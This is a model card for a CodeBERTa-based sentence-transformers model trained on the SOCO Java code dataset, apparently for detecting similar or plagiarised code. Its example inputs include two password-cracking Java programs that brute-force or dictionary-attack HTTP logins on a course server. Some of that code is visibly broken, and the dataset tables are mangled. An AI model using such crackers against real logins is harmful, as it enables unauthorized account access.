Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper
•
1908.10084
•
Published
•
9
This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_train_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERTa-Softmax-PairClass")
# Run inference
sentences = [
'\n\n\n\n\n\n\nimport java.io.*;\nimport java.lang.Object;\n\npublic class WatchDog\n{\n\n \n public static void main(String args[])throws Exception\n {\n Process p1,p2,p3,p4,p5;\n \n for(;;)\n {\n \n\n String s1[] = {"/usr/local//tcsh", "-c", "mailx -s \\"Part 2-Assignment2 \\" < change.html"};\n String s2[] = {"/usr/local//tcsh", "-c", "mv www.cs.rmit.edu./images/*.* predir"};\n String s3[] = {"/usr/local//tcsh", "-c", "mv www.cs.rmit.edu./students/*.* predir"};\n String s4[] = {"/usr/local//tcsh", "-c", "mv www.cs.rmit.edu./images/*.* postdir"};\n String s5[] = {"/usr/local//tcsh", "-c", "mv www.cs.rmit.edu./students/*.* postdir"};\n String s6[] = {"/usr/local//tcsh", "-c", "diff copy1 copy2 > diff.html"};\n\n\n Process p = Runtime.getRuntime().exec("mkdir predir");\n p.waitFor();\n Process p1 = Runtime.getRuntime().exec("mkdir postdir");\n p1.waitFor();\n\n \n p1 = Runtime.getRuntime().exec("wget -p --convert-links http://www.cs.rmit.edu./students/");\n p1.waitFor();\n\n Process q2 = Runtime.getRuntime().exec(s2);\n q2.waitFor();\n Process q3 = Runtime.getRuntime().exec(s3);\n q2.waitFor();\n\n \n Thread.sleep(86400000);\n\n p3 = Runtime.getRuntime().exec("wget -p --convert-links http://www.cs.rmit.edu./students/");\n p3.waitFor();\n\n Process q4 = Runtime.getRuntime().exec(s4);\n q4.waitFor();\n Process q5 = Runtime.getRuntime().exec(s5);\n q5.waitFor();\n\n try\n {\n String str;\n p4 = Runtime.getRuntime().exec(s6);\n DataInputStream inp1 = new DataInputStream(p4.getInputStream());\n p4.waitFor();\n \n System.out.println("The WatchDog - Returns 0 if change else 1");\n System.out.println("Value :" + p4.exitValue());\n try\n {\n while ((str = inp1.readLine()) != null)\n {\n System.out.println(str);\n }\n }\n catch (IOException e)\n {\n System.exit(0);\n }\n\n }\n catch(FileNotFoundException e )\n {\n e.printStackTrace();\n }\n\n BufferedReader in = new BufferedReader(new FileReader("change.html"));\n \n if (in.readLine() != null)\n {\n\n try\n {\n String str1;\n p5 = Runtime.getRuntime().exec(s1);\n DataInputStream inp2 = new DataInputStream(p5.getInputStream());\n p5.waitFor();\n try\n {\n while ((str1 = inp2.readLine()) != null)\n {\n System.out.println(str1);\n }\n }\n catch (IOException e1)\n {\n System.exit(0);\n }\n\n }\n catch(FileNotFoundException exp)\n {\n exp.printStackTrace();\n }\n\n }\n }\n }\n}\n\n',
'import java.io.*;\nimport java.util.*;\nimport java.net.*;\nimport java.net.Authenticator;\n\n\npublic class BruteForce\n{\n\n\tprivate String result ="";\n\n\tpublic class customAuthenticator extends Authenticator {\n\t public customAuthenticator(String passwd)\n {\n this.pass = passwd;\n }\n\n\t protected PasswordAuthentication getPasswordAuthentication()\n {\n\t return new PasswordAuthentication("",pass.toCharArray());\n }\n public String pass;\n }\n\n public BruteForce() {\n java.util.Date d = java.util.Calendar.getInstance().getTime();\n System.out.println(d.toString());\n\t\tchar words[] = { \'a\',\'b\',\'c\',\'d\',\'e\', \'f\', \'g\', \'h\', \'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\n\t\t\t\t\t\t\t \'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\', \'A\',\'B\',\'C\',\'D\',\'E\', \'F\', \'G\',\n\t\t\t\t\t\t\t \'H\', \'I\',\'J\',\'K\',\'L\',\'M\',\'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\'};\n\n\t\tString record = null;\n\n\n\n String url = "http://sec-crack.cs.rmit.edu./SEC/2/";\n\n\t\tchar pass[] = {\'x\',\'x\',\'x\'};\n\t\tint count=1;\n\t\tString passwd=new String();\n HttpURLConnection connection = null;\n URL u = null;\n\n try\n {\n u = new URL(url);\n\n }\n catch (MalformedURLException e)\n {\n }\n\n for(int a=0;a<words.length;a++)\n {\n for(int b=0;b<words.length;b++)\n {\n for(int c=0;c<words.length;c++)\n {\n pass[0]=words[a];\n pass[1]=words[b];\n pass[2]=words[c];\n passwd=passwd.copyValueOf(pass,0,3);\n System.out.println(count+ " ) " + passwd);\n count++;\n try\n {\n\n connection = (HttpURLConnection) u.openConnection();\n Authenticator.setDefault(new customAuthenticator(passwd));\n\n if (connection.getResponseCode()!=401)\n {\n System.out.print("The password is : "+passwd);\n System.out.println();\n java.util.Date d1 = java.util.Calendar.getInstance().getTime();\n System.out.println(d1.toString());\n System.out.println("\\ntime taken in seconds:"+ (d1.getTime() - d.getTime())/1000+"\\n");\n\n System.exit(0);\n }\n else\n {\n }\n connection.disconnect();\n }\n catch (IOException e)\n {\n System.out.println(e);\n }\n }\n }\n }\n }\n\n\tpublic static void main(String[] args)\n\t{\n\n\n\t\tBruteForce = new BruteForce();\n\t}\n}',
'import java.Object;\nimport java.io.*;\nimport java.String;\nimport java.util.*;\n\nclass Dictionary{\n\n public static void main(String [] args){\n try\n {\n Date d = new Date();\n String line1="";\n String ps="";\n String file1 = "words.txt";\n String file2 = "index.html";\n String endline="Authorization failed.";\n String [] cmd = new String[4];\n cmd[0] = "wget";\n cmd[1] = "--http-user=";\n cmd[3] = "http://sec-crack.cs.rmit.edu./SEC/2/";\n\n FileReader fr1 = new FileReader(file1);\n BufferedReader in1 = new BufferedReader(fr1);\n while((line1 = in1.readLine())!=null)\n {\n try{\n cmd[2] = connect(line1);\n Runtime.getRuntime().exec(cmd);\n if(line1.length()==3)\n ps = line1;\n System.out.println(cmd[2]);\n File f = new File(file2);\n if(f.exists())\n {\n System.out.println("password: " + ps);\n break;\n }\n }\n catch(IOException ex)\n {\n System.out.println("hello1");\n }\n\n }\n Date end = new Date();\n System.out.println(d.toString());\n System.out.println(end.toString());\n System.out.println("Seconds: " + (end.getSeconds()-d.getSeconds()));\n }\n\n catch(IOException e)\n {\n System.out.println("hello,didnt find file.");\n }\n }\n public static String connect(String str1)\n {\n char data[] = {\'-\',\'-\',\'h\',\'t\',\'t\',\'p\',\'-\',\'p\',\'a\',\'s\',\'s\',\'w\',\'d\',\'=\'};\n String str = new String(data);\n return str + str1;\n }\n\n}\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
label, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
import java.io.; |
|
0 |
|
|
0 |
|
import java.io.*; |
SoftmaxLosslabel, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
import java.io.; |
|
0 |
|
import java.net.; |
0 |
import java.io.; |
|
SoftmaxLosseval_strategy: stepsper_device_train_batch_size: 16per_device_eval_batch_size: 16num_train_epochs: 1warmup_ratio: 0.1fp16: Trueoverwrite_output_dir: Falsedo_predict: Falseeval_strategy: stepsprediction_loss_only: Trueper_device_train_batch_size: 16per_device_eval_batch_size: 16per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 5e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1.0num_train_epochs: 1max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.1warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Truefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters: auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: proportional| Epoch | Step | Training Loss | Validation Loss |
|---|---|---|---|
| 0.0532 | 100 | 0.0842 | 0.0238 |
| 0.1064 | 200 | 0.0111 | 0.0203 |
| 0.1596 | 300 | 0.0061 | 0.0253 |
| 0.2128 | 400 | 0.0243 | 0.0203 |
| 0.2660 | 500 | 0.0311 | 0.0209 |
| 0.3191 | 600 | 0.0212 | 0.0203 |
| 0.3723 | 700 | 0.0137 | 0.0237 |
| 0.4255 | 800 | 0.03 | 0.0199 |
| 0.4787 | 900 | 0.0104 | 0.0195 |
| 0.5319 | 1000 | 0.0141 | 0.0201 |
| 0.5851 | 1100 | 0.0214 | 0.0186 |
| 0.6383 | 1200 | 0.0151 | 0.0192 |
| 0.6915 | 1300 | 0.0219 | 0.0185 |
| 0.7447 | 1400 | 0.0152 | 0.0184 |
| 0.7979 | 1500 | 0.0082 | 0.0192 |
| 0.8511 | 1600 | 0.0128 | 0.0182 |
| 0.9043 | 1700 | 0.0155 | 0.0172 |
| 0.9574 | 1800 | 0.0102 | 0.0174 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
Base model
huggingface/CodeBERTa-small-v1